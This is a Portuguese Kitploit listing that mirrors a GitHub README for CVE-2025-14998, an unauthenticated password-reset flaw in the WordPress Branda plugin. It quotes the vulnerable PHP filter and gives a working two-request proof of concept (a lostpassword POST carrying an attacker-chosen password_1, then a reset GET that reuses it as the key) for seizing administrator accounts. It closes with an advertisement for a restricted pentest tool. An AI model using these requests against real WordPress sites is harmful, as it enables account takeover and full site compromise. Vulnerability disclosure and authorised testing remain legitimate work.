Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-14998 — CVE-2025-14998 Plugin Wordpress - Branda – White Label & Branding, Personalizador gratuito de página de login <= 3.4.24 - Escalada de privilégios não autenticada via tomada de conta | Kitploit
Ferramentas/GitHubGitHub/ktn1990/cve-2025-14998
Ataques de SenhaAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAutenticação
GitHubktn1990/cve-2025-14998

CVE-2025-14998

CVE-2025-14998 Plugin Wordpress - Branda – White Label & Branding, Personalizador gratuito de página de login <= 3.4.24 - Escalada de privilégios não autenticada via tomada de conta

Ver Repositório
22há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Wordpress Branda – White Label e Branding, Personalizador Gratuito de Página de Login <= 3.4.24 - Escalação de Privilégio Não Autenticada via Assunção de Conta

CVE-2025-14998 O plugin Branda para WordPress é vulnerável a escalação de privilégios via assunção de conta em todas as versões até a 3.4.24, inclusive. Isso se deve ao fato de o plugin não validar corretamente a identidade de um usuário antes de atualizar sua senha. Isso possibilita que atacantes não autenticados alterem senhas de usuários arbitrários, incluindo administradores, e aproveitem isso para obter acesso às suas contas.

Para mais vulnerabilidades WordPress e ferramentas exclusivas de pentest, entre em contato comigo no Telegram @KtN1990.

🔍 Análise da Causa Raiz

O plugin substitui a lógica de geração de senha do WordPress ao se conectar ao filtro random_password. Em vez de permitir que o WordPress gere uma senha aleatória segura, o plugin a substitui por uma entrada controlada pelo usuário.

Código Vulnerável

root@kitploit:~
public function password_random_password_filter( $password ) {
    global $wpdb, $signup_password_use_encryption;

    if ( isset( $_GET['key'] ) && ! empty( $_GET['key'] ) ) {
        $key = $_GET['key'];
    } elseif ( isset( $_POST['key'] ) && ! empty( $_POST['key'] ) ) {
        $key = $_POST['key'];
    }

    if ( ! empty( $_POST['password_1'] ) ) {
        $password = $_POST['password_1'];
    } elseif ( ! empty( $key ) ) {
        $signup = $wpdb->get_row(
            $wpdb->prepare(
                "SELECT * FROM $wpdb->signups WHERE activation_key = '%s'",
                $key
            )
        );

        if ( ! ( empty( $signup ) || $signup->active ) ) {
            $meta = maybe_unserialize( $signup->meta );

            if ( ! empty( $meta['password'] ) ) {
                if ( 'yes' === $signup_password_use_encryption ) {
                    $password = $this->password_decrypt( $meta['password'] );
                } else {
                    $password = $meta['password'];
                }
            }
        }
    }

    return $password;
}

🧪 Prova de Conceito (Sanitizada)

Passo 1 — Acionar a Redefinição de Senha com Senha Arbitrária

root@kitploit:~
POST /wp/wp-login.php?action=lostpassword HTTP/1.1
Host: example.local
Content-Type: application/x-www-form-urlencoded

user_login=admin&
redirect_to=&
password_1=EfUSmvnTun5XbvE6RvIB&
wp-submit=Get+New+Password

O valor de password_1 pode ser qualquer string controlada pelo atacante.


Passo 2 — Concluir a Redefinição Usando o Mesmo Valor como Chave de Redefinição

root@kitploit:~
GET /wp/wp-login.php?login=admin&key=EfUSmvnTun5XbvE6RvIB&action=rp HTTP/1.1
Host: example.local

✅ Resultado

  • O WordPress aceita a senha controlada pelo atacante
  • A senha do administrador é alterada
  • O atacante pode autenticar-se como o usuário afetado

Nenhum acesso a e-mail ou token válido de redefinição de senha é necessário.


💥 Impacto

Um atacante não autenticado pode:

  • Redefinir senhas de qualquer usuário do WordPress
  • Assumir contas de administrador
  • Obter controle total da instalação do WordPress
  • Modificar plugins, temas ou conteúdo

Contato

  • @KtN1990

Mais vulnerabilidades? Conheça o Megatron!

Logo

  • 💣 O que é o Megatron? O Megatron é uma ferramenta avançada de teste de penetração projetada para testadores sérios e red teamers. Esteja você auditando, escaneando ou testando infraestruturas, o Megatron oferece o poder que você precisa.

-🛡️ Ideal para: – Pesquisadores de segurança – Testadores de penetração – Hackers éticos

  • 📦 Linha mantida com ~230 módulos legados de pesquisa; melhorias recentes no núcleo do scanner para estabilidade e detecção.

  • 🎯 Finalidade: Fornecido estritamente para testes de segurança autorizados, educação, pesquisa defensiva e treinamento de red team. Esta versão não se destina a uso ilegal. A distribuição é controlada — acesso somente após verificação e assinatura de um Acordo de Uso Responsável / NDA.

-🛡 Política de acesso responsável (resumo):

  1. Acesso somente a profissionais de segurança verificados, equipes de segurança corporativas, laboratórios credenciados ou provedores de treinamento.
  2. Você deve fornecer nome da organização, cargo, e-mail oficial (corporativo) e finalidade lícita.
  3. Download completo concedido somente após verificação e assinatura do nosso Acordo de Uso Responsável / NDA.
  4. Tolerância zero para uso indevido — evidências de uso malicioso resultam em revogação e notificação quando necessário.
  • 📩 Contato / Solicitações / Verificação: @KtN1990 — inclua organização, cargo e um breve motivo para o acesso. Canal do Telegram

Demonstração

IMAGE ALT TEXT HERE

Licença

MIT

Baixar ferramenta